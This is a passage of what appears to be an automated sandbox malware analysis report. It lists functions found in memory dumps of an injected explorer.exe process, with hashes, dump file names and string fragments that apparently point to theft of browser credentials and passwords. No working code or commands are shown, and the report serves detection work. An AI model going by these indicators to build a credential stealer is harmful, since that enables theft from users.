                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                  • API String ID: 0-97273177
                                                                                                                                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction ID: 055a6df9268754884fa4103c15caab1a5d5a8d6f60c91d288dbd6bf88cb6d8d0
                                                                                                                                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction Fuzzy Hash: 4B51C1701187488FD719DF18C8852AEB7E5FBC4300F541E2EEA8BC7252DBB49906CB82
                                                                                                                                                  Function 0F6E9F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                  • API String ID: 0-97273177
                                                                                                                                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction ID: ed256cdc8848dae87ce69ab87a08ed26a584cd10bddb042ece2a032f8cac14d6
                                                                                                                                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                  • Instruction Fuzzy Hash: 3251E5311197488FD719DF58D4812EAB7E5FBC5704F501A2EE8CBC7252DBB89906CB82
                                                                                                                                                  Function 0E6632F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                  • Instruction ID: 2466a5681a2565ced4fe7fa36fef9b8237d3c83a2cd54ccbd1f004ab7e8310d5
                                                                                                                                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                  • Instruction Fuzzy Hash: 14C19E70628E198FC758EF68E455AAAF3E1FB98300F55472D844AD7251DF30AE05CBC9
                                                                                                                                                  Function 0E6632F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                  • Instruction ID: 5158e48eb5c11daf85561a369112d34f77d91b5049269cdad8c97abfb99287a8
                                                                                                                                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                  • Instruction Fuzzy Hash: 20C19D70628A198FC758EF68E495AAAF3E1FB98300F55472D844AD7251DF30AE01CB89
                                                                                                                                                  Function 0E59A2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                  • Instruction ID: e79fff370083852d04abd496d0ed48f72eb78e792db9774a0b22e5993aa481c0
                                                                                                                                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                  • Instruction Fuzzy Hash: 13C18F70618A1A4FCB58EF68D455AEAB3E1FF98304F944B29960EC7251DF30E905CBC5
                                                                                                                                                  Function 0E59A2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                  • Instruction ID: 1a13c83d6ed5f2ee854c0c53d8113da4b4b124a254185a69b438cf0c34565260
                                                                                                                                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                  • Instruction Fuzzy Hash: 9CC18E70618E1A4FCB58EB68D455AEAB3E1FF98304F844B29860EC7251DF30EA05CBC5
                                                                                                                                                  Function 0F6E32F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                  • Instruction ID: 6bd5c0fbb13b8ce2635b60d5fcbac69976cae13f237a4675ceb963aa29f9d1a7
                                                                                                                                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                  • Instruction Fuzzy Hash: 95C1A072619B198FC758EF68C495AEAF7E1FF98300F91432D940AC7252DF34A906C789
                                                                                                                                                  Function 0F6E32F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                  • Instruction ID: 18a8a52ce34c2e2fe2d9fb7b092298559be6e31ec77e5932125a13782247c2d4
                                                                                                                                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                  • Instruction Fuzzy Hash: 61C19F72619B198FC758EF68C495AEAF7E1FF98300F91432D940AC7252DF34A906C789
                                                                                                                                                  Function 0E664CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                  • API String ID: 0-2058692283
                                                                                                                                                  • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                  • Instruction ID: 2076f59be7c679ec26746106d2e5d8033dd8927101b52d21e95235bf3d413f4f
                                                                                                                                                  • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                  • Instruction Fuzzy Hash: E1A1C170628B488FDB18EFA8E4447EEB7E1FF89300F004A2DD48AD7251EF3499458789
                                                                                                                                                  Function 0E59BCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                  • API String ID: 0-2058692283
                                                                                                                                                  • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                  • Instruction ID: ae0ae3b7251af84ed9e030ce89a9a486d08c2c99222528ac59d50a51b47a54a3
                                                                                                                                                  • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                  • Instruction Fuzzy Hash: C6A19D706187488FDB28EFA8A4447EEB7E1FB88304F404A2DE58AD7251EB749945C789
                                                                                                                                                  Function 0F6E4CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                  • API String ID: 0-2058692283
                                                                                                                                                  • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                  • Instruction ID: f9c94f919f15f58a3d82c68092f881055c945a0df3cb5db8910bfcb54ba29087
                                                                                                                                                  • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                  • Instruction Fuzzy Hash: EDA1BE716187488BDB28EFA89444BEEB7E1FF98300F40462EE48AD7252EF749545C789
                                                                                                                                                  Function 0E664CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                  • API String ID: 0-2058692283
                                                                                                                                                  • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                  • Instruction ID: 0d429a59bf0a3258c73e753be269d50c07a35d9099f367b71456136b081e79d7
                                                                                                                                                  • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                  • Instruction Fuzzy Hash: 8191A170628B488FDB18EFA8E4447EEB7E1FF98304F00462ED48AD7251EF7489458789
                                                                                                                                                  Function 0E59BCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                  • API String ID: 0-2058692283
                                                                                                                                                  • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                  • Instruction ID: 99924d0049b5ae06e6bbbc331a6d4bac35523dea4bfc939bfb2b129436796d8a
                                                                                                                                                  • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                  • Instruction Fuzzy Hash: 3A918F706187488FDB18EFA8E4447EEB7E1FB88304F404A2ED58AD7251EF749945C789
                                                                                                                                                  Function 0F6E4CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                  • API String ID: 0-2058692283
                                                                                                                                                  • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                  • Instruction ID: bb696c94c69ab7c36d8ca31ac13076216cddff10b77b31eb6dc05664a280f01c
                                                                                                                                                  • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                  • Instruction Fuzzy Hash: 2B91AF716187488BDB28EFA8D444BEEB7E1FF98304F40462EE48AD7242EF749545C789
                                                                                                                                                  Function 0E664352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $.$e$n$v
                                                                                                                                                  • API String ID: 0-1849617553
                                                                                                                                                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                  • Instruction ID: 56de8c3960e2bfb0b0c569dbabc05323baeddc88eb9c0684065f4a081dc5eed1
                                                                                                                                                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                  • Instruction Fuzzy Hash: F3719031628B488FD758EFA8D4886AAB7F1FF58304F00062ED49AC7221EF71DD458B85
                                                                                                                                                  Function 0E59B352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $.$e$n$v
                                                                                                                                                  • API String ID: 0-1849617553
                                                                                                                                                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                  • Instruction ID: 30e814686572f76a022ecac33a98e8dad9bf13c7421ffa674a1e8fcb88d792c5
                                                                                                                                                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                  • Instruction Fuzzy Hash: 1B719431618B498FD758EFA8D4887AEB7F5FF98304F000A2ED54AC7221EB71D9458B85
                                                                                                                                                  Function 0F6E4352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $.$e$n$v
                                                                                                                                                  • API String ID: 0-1849617553
                                                                                                                                                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                  • Instruction ID: 13f4a9afbbcf539d70f6220312832c5591fe9a0b860e881a99d157d48a5ed484
                                                                                                                                                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                  • Instruction Fuzzy Hash: F27173326187498FD758EFA8D4846AAB7F1FF94304F00062ED44AC7262EF75D9458B85
                                                                                                                                                  Function 0E65FC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                  • API String ID: 0-1970020201
                                                                                                                                                  • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                  • Instruction ID: 6c689436aecf813f4cfa89a6c4942987fe0961670511cfe17d322ba8d6bbd66d
                                                                                                                                                  • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                  • Instruction Fuzzy Hash: 24514FB0928B4C8FDB54EFA4D045AEEB7F1FF58300F404A2E959AE7214EF7095418B89
                                                                                                                                                  Function 0E596C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                  • API String ID: 0-1970020201
                                                                                                                                                  • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                  • Instruction ID: 8caabeb5cbfce3d4951f6020f178f3c0851f0f6e895047bfbc3ad9faa9766f02
                                                                                                                                                  • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                  • Instruction Fuzzy Hash: C0515CB0918B4D8FDB64EFA4D045AEEB7E1FF58300F404A2E959AE7214EF7095418B89
                                                                                                                                                  Function 0F6DFC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                  • API String ID: 0-1970020201
                                                                                                                                                  • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                  • Instruction ID: 8ef3c0d306e1e7cc3fcd044fcb9a0f0dba6035d003b0570a8a2c7b24ea9684f7
                                                                                                                                                  • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                  • Instruction Fuzzy Hash: 95515CB1918B4C8FDB64EFA4C084AEEB7F1FF58300F40462E949AE7215EF3495458B89
                                                                                                                                                  Function 0E66086F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4$\$dll$ion.$vers
                                                                                                                                                  • API String ID: 0-1610437797
                                                                                                                                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction ID: 4a7dfc708a1f7ddebaf6133d533fa340247e08556458fef22c319f8da1034de1
                                                                                                                                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction Fuzzy Hash: D3416330228B4C8FCBB5EF6498557EA73E4FB99301F50462E949EC7241EF70D9458786
                                                                                                                                                  Function 0E59786F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4$\$dll$ion.$vers
                                                                                                                                                  • API String ID: 0-1610437797
                                                                                                                                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction ID: eada0a4ea91e2352e49ce81a29d90155d1a68453c259647a41e06c3b8b66969c
                                                                                                                                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction Fuzzy Hash: BF416E34228B498FDB75EF2498557EA73E4FB98311F444A2E998EC7240EF30DA45C782
                                                                                                                                                  Function 0F6E086F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4$\$dll$ion.$vers
                                                                                                                                                  • API String ID: 0-1610437797
                                                                                                                                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction ID: d9b0fbec8519c7ca8c41d5466725ebd9d50504fa9404a18492272bc8841136da
                                                                                                                                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                  • Instruction Fuzzy Hash: B5418132219B4C8FCBB5EF6898457EA73E4FB98301F40462E989EC7242EF74D5058786
                                                                                                                                                  Function 0E6624B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                  • API String ID: 0-327345718
                                                                                                                                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                  • Instruction ID: d1cdbb1c8f9bf310c4410fd288e5964e94ef80088fc00d96c5b5980d071e5b7d
                                                                                                                                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                  • Instruction Fuzzy Hash: 53414430628E0D8FCB68EF68A0A57AE77E1FB58304F40456E984ED7351EA71D9418BC5
                                                                                                                                                  Function 0E5994B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                  • API String ID: 0-327345718
                                                                                                                                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                  • Instruction ID: e9cc3b84989600885514ba66977696b0726bd9cf1deb6ba89800a051cab2198b
                                                                                                                                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                  • Instruction Fuzzy Hash: AA415E30A19E0D8FCF94EF6880A57EE77E1FF98301F44496E980ED7210DA71C9419B86
                                                                                                                                                  Function 0F6E24B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
